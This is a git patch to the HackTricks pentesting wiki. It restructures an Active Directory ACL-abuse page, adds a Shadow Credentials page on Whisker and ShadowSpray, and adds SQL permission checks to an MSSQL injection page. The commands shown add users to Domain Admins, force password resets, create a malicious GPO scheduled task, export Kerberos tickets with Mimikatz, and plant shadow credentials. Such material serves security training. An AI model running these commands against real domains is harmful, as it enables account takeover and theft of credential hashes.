From bd0b87e02c34f2c9c10b180d6b6c0f2231c94e7f Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 10 Oct 2022 21:08:59 +0000 Subject: [PATCH] GitBook: [#3592] No subject --- SUMMARY.md | 3 +- .../sql-injection/mssql-injection.md | 31 ++++- .../active-directory-methodology/README.md | 8 +- .../README.md} | 84 ++++++------- .../shadow-credentials.md | 111 ++++++++++++++++++ .../unconstrained-delegation.md | 31 ++--- .../powerview.md | 6 +- 7 files changed, 205 insertions(+), 69 deletions(-) rename windows-hardening/active-directory-methodology/{acl-persistence-abuse.md => acl-persistence-abuse/README.md} (90%) create mode 100644 windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md diff --git a/SUMMARY.md b/SUMMARY.md index 46c83ab39..6c349ffd0 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -161,7 +161,8 @@ * [SeImpersonate from High To System](windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md) * [Windows C Payloads](windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md) * [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md) - * [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse.md) + * [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md) + * [Shadow Credentials](windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md) * [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md) * [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md) * [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md) diff --git a/pentesting-web/sql-injection/mssql-injection.md b/pentesting-web/sql-injection/mssql-injection.md index 0267259ec..bd0f0aa46 100644 --- a/pentesting-web/sql-injection/mssql-injection.md +++ b/pentesting-web/sql-injection/mssql-injection.md @@ -63,6 +63,14 @@ https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_f **Permissions:** Requires **`VIEW SERVER STATE`** permission on the server. +```sql +# Check if you have it +SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE'; +# Or doing +Use master; +EXEC sp_helprotect 'fn_xe_file_target_read_file'; +``` + ### `fn_get_audit_file` ``` @@ -73,6 +81,14 @@ https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_aud **Permissions:** Requires the **`CONTROL SERVER`** permission. +```sql +# Check if you have it +SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER'; +# Or doing +Use master; +EXEC sp_helprotect 'fn_get_audit_file'; +``` + ### `fn_trace_gettabe` ``` @@ -83,6 +99,14 @@ https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2 **Permissions:** Requires the **`CONTROL SERVER`** permission. +```sql +# Check if you have it +SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER'; +# Or doing +Use master; +EXEC sp_helprotect 'fn_trace_gettabe'; +``` + ### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` The most common method to make a network call yosqlu will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet. @@ -135,7 +159,7 @@ public partial class UserDefinedFunctions In the installation instructions, run the following before the `CREATE ASSEMBLY` query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using `select * from sys.trusted_assemblies;`) -``` +```sql EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil'; ``` @@ -181,6 +205,11 @@ https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_ **Permissions:** If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session. +```sql +# Check if you have it +SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE'; +``` + ## **Little tricks for WAF bypasses** Non-standard whitespace characters: %C2%85 ΠΈΠ»ΠΈ %C2%A0: diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index c8477b7c3..d9751df4b 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -333,8 +333,8 @@ It's possible to gain code execution with **elevated privileges on a remote comp The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges. -{% content-ref url="acl-persistence-abuse.md" %} -[acl-persistence-abuse.md](acl-persistence-abuse.md) +{% content-ref url="acl-persistence-abuse/" %} +[acl-persistence-abuse](acl-persistence-abuse/) {% endcontent-ref %} ### Printer Spooler service abuse @@ -465,8 +465,8 @@ There is a **local administrator** account inside each **DC**. Having admin priv You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**. -{% content-ref url="acl-persistence-abuse.md" %} -[acl-persistence-abuse.md](acl-persistence-abuse.md) +{% content-ref url="acl-persistence-abuse/" %} +[acl-persistence-abuse](acl-persistence-abuse/) {% endcontent-ref %} ### Security Descriptors diff --git a/windows-hardening/active-directory-methodology/acl-persistence-abuse.md b/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md similarity index 90% rename from windows-hardening/active-directory-methodology/acl-persistence-abuse.md rename to windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md index f36d8b5e5..2458ea547 100644 --- a/windows-hardening/active-directory-methodology/acl-persistence-abuse.md +++ b/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md @@ -12,8 +12,6 @@ -**This information was mostly copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect** - ## Context This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs. @@ -22,7 +20,7 @@ Active Directory objects such as users and groups are securable objects and DACL An example of ACEs for the "Domain Admins" securable object can be seen here: -![](<../../.gitbook/assets/1 (1).png>) +![](<../../../.gitbook/assets/1 (1).png>) Some of the Active Directory object permissions and types that we as attackers are interested in: @@ -48,7 +46,7 @@ Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.ActiveDirectoryRigh We can see that indeed our user `spotless` has the `GenericAll` rights, effectively enabling the attacker to take over the account: -![](../../.gitbook/assets/2.png) +![](../../../.gitbook/assets/2.png) * **Change password**: You could just change the password of that user with @@ -83,7 +81,7 @@ Let's see if `Domain admins` group has any weak permissions. First of, let's get Get-NetGroup "domain admins" -FullData ``` -![](../../.gitbook/assets/4.png) +![](../../../.gitbook/assets/4.png) ```csharp Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local"} @@ -91,7 +89,7 @@ Get-NetGroup "domain admins" -FullData We can see that our attacking user `spotless` has `GenericAll` rights once again: -![](../../.gitbook/assets/5.png) +![](../../../.gitbook/assets/5.png) Effectively, this allows us to add ourselves (the user `spotless`) to the `Domain Admin` group: @@ -99,7 +97,7 @@ Effectively, this allows us to add ourselves (the user `spotless`) to the `Domai net group "domain admins" spotless /add /domain ``` -![](../../.gitbook/assets/6.gif) +![](../../../.gitbook/assets/6.gif) Same could be achieved with Active Directory or PowerSploit module: @@ -111,16 +109,21 @@ Add-ADGroupMember -Identity "domain admins" -Members spotless Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local" ``` -## GenericAll / GenericWrite / Write on Computer +## GenericAll / GenericWrite / Write on Computer/User -* If you have these privileges on a Computer object, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](resource-based-constrained-delegation.md) off. -* If you have these privs over a user, you +* If you have these privileges on a **Computer object**, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](../resource-based-constrained-delegation.md) off. +* If you have these privs over a user, you can use one of the [first methods explained in this page](./#genericall-on-user). +* Or, either you have it in a Computer or a user you can use **Shadow Credentials** to impersonate it: + +{% content-ref url="shadow-credentials.md" %} +[shadow-credentials.md](shadow-credentials.md) +{% endcontent-ref %} ## WriteProperty on Group If our controlled user has `WriteProperty` right on `All` objects for `Domain Admin` group: -![](../../.gitbook/assets/7.png) +![](../../../.gitbook/assets/7.png) We can again add ourselves to the `Domain Admins` group and escalate privileges: @@ -128,19 +131,19 @@ We can again add ourselves to the `Domain Admins` group and escalate privileges: net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain ``` -![](../../.gitbook/assets/8.png) +![](../../../.gitbook/assets/8.png) ## Self (Self-Membership) on Group Another privilege that enables the attacker adding themselves to a group: -![](../../.gitbook/assets/9.png) +![](../../../.gitbook/assets/9.png) ```csharp net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain ``` -![](../../.gitbook/assets/10.png) +![](../../../.gitbook/assets/10.png) ## WriteProperty (Self-Membership) @@ -150,13 +153,13 @@ One more privilege that enables the attacker adding themselves to a group: Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/11.png) +![](../../../.gitbook/assets/11.png) ```csharp net group "domain admins" spotless /add /domain ``` -![](../../.gitbook/assets/12.png) +![](../../../.gitbook/assets/12.png) ## **ForceChangePassword** @@ -166,7 +169,7 @@ If we have `ExtendedRight` on `User-Force-Change-Password` object type, we can r Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/13.png) +![](../../../.gitbook/assets/13.png) Doing the same with powerview: @@ -174,7 +177,7 @@ Doing the same with powerview: Set-DomainUserPassword -Identity delegate -Verbose ``` -![](../../.gitbook/assets/14.png) +![](../../../.gitbook/assets/14.png) Another method that does not require fiddling with password-secure-string conversion: @@ -183,7 +186,7 @@ $c = Get-Credential Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose ``` -![](../../.gitbook/assets/15.png) +![](../../../.gitbook/assets/15.png) ...or a one liner if no interactive session is not available: @@ -191,7 +194,7 @@ Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ``` -![](../../.gitbook/assets/16.png) +![](../../../.gitbook/assets/16.png) and one last way yo achieve this from linux: @@ -210,7 +213,7 @@ More info: Note how before the attack the owner of `Domain Admins` is `Domain Admins`: -![](../../.gitbook/assets/17.png) +![](../../../.gitbook/assets/17.png) After the ACE enumeration, if we find that a user in our control has `WriteOwner` rights on `ObjectType:All` @@ -218,7 +221,7 @@ After the ACE enumeration, if we find that a user in our control has `WriteOwner Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/18.png) +![](../../../.gitbook/assets/18.png) ...we can change the `Domain Admins` object's owner to our user, which in our case is `spotless`. Note that the SID specified with `-Identity` is the SID of the `Domain Admins` group: @@ -228,7 +231,7 @@ Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -Ow Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico ``` -![](../../.gitbook/assets/19.png) +![](../../../.gitbook/assets/19.png) ## GenericWrite on User @@ -236,7 +239,7 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/20.png) +![](../../../.gitbook/assets/20.png) `WriteProperty` on an `ObjectType`, which in this particular case is `Script-Path`, allows the attacker to overwrite the logon script path of the `delegate` user, which means that the next time, when the user `delegate` logs on, their system will execute our malicious script: @@ -246,7 +249,7 @@ Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\ Below shows the user's ~~`delegate`~~ logon script field got updated in the AD: -![](../../.gitbook/assets/21.png) +![](../../../.gitbook/assets/21.png) ## GenericWrite on Group @@ -268,7 +271,7 @@ Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'use If you are the owner of a group, like I'm the owner of a `Test` AD group: -![](../../.gitbook/assets/22.png) +![](../../../.gitbook/assets/22.png) Which you can of course do through powershell: @@ -276,13 +279,13 @@ Which you can of course do through powershell: ([ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value ``` -![](../../.gitbook/assets/23.png) +![](../../../.gitbook/assets/23.png) And you have a `WriteDACL` on that AD object: -![](../../.gitbook/assets/24.png) +![](../../../.gitbook/assets/24.png) -...you can give yourself [`GenericAll`](../../windows/active-directory-methodology/broken-reference/) privileges with a sprinkle of ADSI sorcery: +...you can give yourself [`GenericAll`](../../../windows/active-directory-methodology/broken-reference/) privileges with a sprinkle of ADSI sorcery: ```csharp $ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local" @@ -294,7 +297,7 @@ $ADSI.psbase.commitchanges() Which means you now fully control the AD object: -![](../../.gitbook/assets/25.png) +![](../../../.gitbook/assets/25.png) This effectively means that you can now add new users to the group. @@ -308,18 +311,18 @@ $acl.AddAccessRule($ace) Set-Acl -Path $path -AclObject $acl ``` -![](../../.gitbook/assets/26.png) +![](../../../.gitbook/assets/26.png) ## **Replication on the domain (DCSync)** The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\ -[**Learn more about the DCSync attack here.**](dcsync.md) +[**Learn more about the DCSync attack here.**](../dcsync.md) ## GPO Delegation Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with `offense\spotless` user: -![](../../.gitbook/assets/a13.png) +![](../../../.gitbook/assets/a13.png) We can see this by leveraging PowerView like so: @@ -329,13 +332,13 @@ Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"} The below indicates that the user `offense\spotless` has **WriteProperty**, **WriteDacl**, **WriteOwner** privileges among a couple of others that are ripe for abuse: -![](../../.gitbook/assets/a14.png) +![](../../../.gitbook/assets/a14.png) ### Enumerate GPO Permissions We know the above ObjectDN from the above screenshot is referring to the `New Group Policy Object` GPO since the ObjectDN points to `CN=Policies` and also the `CN={DDC640FF-634A-4442-BC2E-C05EED132F0C}` which is the same in the GPO settings as highlighted below: -![](../../.gitbook/assets/a15.png) +![](../../../.gitbook/assets/a15.png) If we want to search for misconfigured GPOs specifically, we can chain multiple cmdlets from PowerSploit like so: @@ -343,7 +346,7 @@ If we want to search for misconfigured GPOs specifically, we can chain multiple Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/a16.png) +![](../../../.gitbook/assets/a16.png) **Computers with a Given Policy Applied** @@ -353,7 +356,7 @@ We can now resolve the computer names the GPO `Misconfigured Policy` is applied Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_} ``` -![](../../.gitbook/assets/a17.png) +![](../../../.gitbook/assets/a17.png) **Policies Applied to a Given Computer** @@ -379,11 +382,11 @@ One of the ways to abuse this misconfiguration and get code execution is to crea New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force ``` -![](../../.gitbook/assets/a19.png) +![](../../../.gitbook/assets/a19.png) The above will add our user spotless to the local `administrators` group of the compromised box. Note how prior to the code execution the group does not contain user `spotless`: -![](../../.gitbook/assets/a20.png) +![](../../../.gitbook/assets/a20.png) ### GroupPolicy module **- Abuse GPO** @@ -420,7 +423,7 @@ if you have access to the computer you can force it with `gpupdate /force` . If we observe the Scheduled Tasks of the `Misconfigured Policy` GPO, we can see our `evilTask` sitting there: -![](../../.gitbook/assets/a22.png) +![](../../../.gitbook/assets/a22.png) Below is the XML file that got created by `New-GPOImmediateTask` that represents our evil scheduled task in the GPO: @@ -508,6 +511,7 @@ Additionally, we could think about leveraging logon/logoff scripts, using regist ## References +* Initially, this information was mostly copied from [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) * [https://wald0.com/?p=112](https://wald0.com/?p=112) * [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2) * [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) diff --git a/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md b/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md new file mode 100644 index 000000000..bf1e2a8cf --- /dev/null +++ b/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md @@ -0,0 +1,111 @@ +# Shadow Credentials + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +## Intro + +Check the original post for [**all the information about this technique**](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab). + +As **summary**: if you can write to the **msDS-KeyCredentialLink** property of a user/computer, you can retrieve the **NT hash of that object**. + +This is because you will be able to set **public-private key authentication credentials** for the object and use them to obtain a **special Service Ticket that contains its NTLM hash** inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM\_SUPPLEMENTAL\_CREDENTIAL entity that you can decrypt. + +### Requirements + +This technique requires the following: + +* At least one Windows Server 2016 Domain Controller. +* A digital certificate for Server Authentication installed on the Domain Controller. +* Windows Server 2016 Functional Level in Active Directory. +* Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object. + +## Abuse + +Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options: + +1. Forge an **RC4 silver ticket** to impersonate privileged users to the corresponding host. +2. Use the TGT to call **S4U2Self** to impersonate **privileged users** to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name. + +Key Trust abuse has the added benefit that it doesn’t delegate access to another account which could get compromised β€” it is **restricted to the private key generated by the attacker**. In addition, it doesn’t require creating a computer account that may be hard to clean up until privilege escalation is achieved. + +Whisker + +Alongside this post I am releasing a tool called β€œ [Whisker](https://github.com/eladshamir/Whisker) β€œ. Based on code from Michael’s DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol. + +[Whisker](https://github.com/eladshamir/Whisker) has four functions: + +* Add β€” This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. +* List β€” This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object. +* Remove β€” This function removes a key credential from the target object specified by a DeviceID GUID. +* Clear β€” This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break. + +## [Whisker](https://github.com/eladshamir/Whisker) + +Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their `msDS-KeyCredentialLink` attribute, effectively adding "Shadow Credentials" to the target account. + +[**Whisker**](https://github.com/eladshamir/Whisker) has four functions: + +* **Add** β€” This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. +* **List** β€” This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object. +* **Remove** β€” This function removes a key credential from the target object specified by a DeviceID GUID. +* **Clear** β€” This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break. + +### Add + +Add a new value to the **`msDS-KeyCredentialLink`** attribute of a target object: + +* `/target:`: Required. Set the target name. Computer objects should end with a '$' sign. +* `/domain:`: Optional. Set the target Fully Qualified Domain Name (FQDN). If not provided, will try to resolve the FQDN of the current user. +* `/dc:`: Optional. Set the target Domain Controller (DC). If not provided, will try to target the Primary Domain Controller (PDC). +* `/path:`: Optional. Set the path to store the generated self-signed certificate for authentication. If not provided, the certificate will be printed as a Base64 blob. +* `/password:`: Optional. Set the password for the stored self-signed certificate. If not provided, a random password will be generated. + +Example: **`Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1`** + +{% hint style="info" %} +More options on the [**Readme**](https://github.com/eladshamir/Whisker). +{% endhint %} + +## [ShadowSpray](https://github.com/Dec0ne/ShadowSpray/) + +In several cases, the group "Everyone" / "Authenticated Users" / "Domain Users" or some other **wide group** contains almost all the users in the domain has some `GenericWrite`/`GenericAll` DACLs **over other objects** in the domain. [**ShadowSpray**](https://github.com/Dec0ne/ShadowSpray/) tries to **abuse** therefore **ShadowCredentials** over all of them + +It goes something like this: + +1. **Login** to the domain with the supplied credentials (Or use the current session). +2. Check that the **domain functional level is 2016** (Otherwise stop since the Shadow Credentials attack won't work) +3. Gather a **list of all the objects** in the domain (users and computers) from LDAP. +4. **For every object** in the list do the following: + 1. Try to **add KeyCredential** to the object's `msDS-KeyCredentialLink` attribute. + 2. If the above is **successful**, use **PKINIT** to request a **TGT** using the added KeyCredential. + 3. If the above is **successful**, perform an **UnPACTheHash** attack to reveal the user/computer **NT hash**. + 4. If **`--RestoreShadowCred`** was specified: Remove the added KeyCredential (clean up after yourself...) +5. If **`--Recursive`** was specified: Do the **same process** using each of the user/computer **accounts we successfully owned**. + +## References + +* [https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab) +* [https://github.com/eladshamir/Whisker](https://github.com/eladshamir/Whisker) +* [https://github.com/Dec0ne/ShadowSpray/](https://github.com/Dec0ne/ShadowSpray/) + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/windows-hardening/active-directory-methodology/unconstrained-delegation.md index 6319c4d0a..ae8502b25 100644 --- a/windows-hardening/active-directory-methodology/unconstrained-delegation.md +++ b/windows-hardening/active-directory-methodology/unconstrained-delegation.md @@ -4,15 +4,11 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** @@ -29,7 +25,6 @@ You can **find Computer objects with this attribute** checking if the [userAccou Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc ## ADSearch ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem - # Export tickets with Mimikatz privilege::debug sekurlsa::tickets /export #Recommended way @@ -53,7 +48,7 @@ To make a print server login against any machine you can use [**SpoolSample**](h .\SpoolSample.exe ``` -If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\ +If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse/#dcsync) and obtain all the hashes from the DC.\ [**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) **Here are other ways to try to force an authentication:** @@ -71,14 +66,10 @@ If the TGT if from a domain controller, you could perform a[ **DCSync attack**]( Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** 